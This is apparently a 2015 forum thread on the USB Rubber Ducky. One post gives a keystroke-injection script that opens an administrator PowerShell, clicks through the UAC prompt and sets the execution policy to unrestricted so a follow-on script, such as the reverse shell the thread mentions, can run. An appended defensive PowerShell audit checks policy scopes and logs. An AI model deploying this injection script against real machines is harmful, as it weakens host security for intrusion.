Double Negative (Posted April 23, 2015)

Just got my ducky today, but I noticed PowerShell is disabled on most Windows PCs and needs to be enabled in order to make most of the payloads work. Any payload on doing that quickly?

overwraith (Posted April 23, 2015)

When making my payloads I try to only use the PowerShell command line interface, which on my home computer was enabled by default. What is not enabled is running PowerShell script files. Which payloads were you referring to?

Double Negative (Posted April 23, 2015)

Something like a reverse shell is a matter of seconds, if you can just download & execute the script file.

overwraith (Posted April 23, 2015)

I haven't tested this yet, so consider it more pseudo code or a general procedure. This may need some more delays, but you get the picture. Needs an admin computer. If it isn't an admin computer you will need to find a way to escalate privileges.

REM *** Initial Delay ***
DELAY 2000
REM *** Start Powershell as admin ***
GUI
STRING powershell
MENU
REM *** Select Run as administrator ***
STRING a
REM *** Say yes to UAC ***
DELAY 1500
ALT Y
DELAY 500
REM *** Actually activating the powershell files ***
STRING Set-ExecutionPolicy unrestricted
ENTER
STRING Y
ENTER
REM *** Done, insert your call to a .ps file here. ***
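
Added example, not part of any post in this thread: a PowerShell audit an administrator can run on a host to see which scope sets the execution policy, whether it has been weakened to the `unrestricted` value discussed above, and whether `Set-ExecutionPolicy` shows up in the PowerShell operational log. The log search assumes script block logging (event ID 4104) is enabled on the host; the 2000-event window is an arbitrary choice.

```powershell
# Added example: audit the PowerShell execution policy on the local host.
# Get-ExecutionPolicy -List returns the scopes in precedence order:
# MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine.
$weak   = 'Unrestricted', 'Bypass'
$scopes = Get-ExecutionPolicy -List
$scopes | Format-Table Scope, ExecutionPolicy -AutoSize

# The effective policy is the first scope that is not Undefined.
$effective = $scopes |
    Where-Object { "$($_.ExecutionPolicy)" -ne 'Undefined' } |
    Select-Object -First 1

if ($null -eq $effective) {
    Write-Output 'No scope is set; the built-in default applies.'
} elseif ("$($effective.ExecutionPolicy)" -in $weak) {
    Write-Warning "Effective policy is $($effective.ExecutionPolicy), set at scope $($effective.Scope)."
} else {
    Write-Output "Effective policy is $($effective.ExecutionPolicy), set at scope $($effective.Scope)."
}

# A policy delivered through Group Policy (MachinePolicy / UserPolicy) takes
# precedence over the local scopes that Set-ExecutionPolicy writes by default.
$gpo = $scopes | Where-Object {
    "$($_.Scope)" -in 'MachinePolicy', 'UserPolicy' -and
    "$($_.ExecutionPolicy)" -ne 'Undefined'
}
if (-not $gpo) {
    Write-Warning 'Execution policy is not enforced by Group Policy; a local administrator can change it.'
}

# Look for recent policy changes in the script block log (assumes logging is enabled).
$filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
$hits = Get-WinEvent -FilterHashtable $filter -MaxEvents 2000 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Set-ExecutionPolicy' }

if ($hits) {
    $hits | Select-Object TimeCreated, UserId, Message | Format-List
} else {
    Write-Output 'No Set-ExecutionPolicy script blocks found in the inspected events.'
}
```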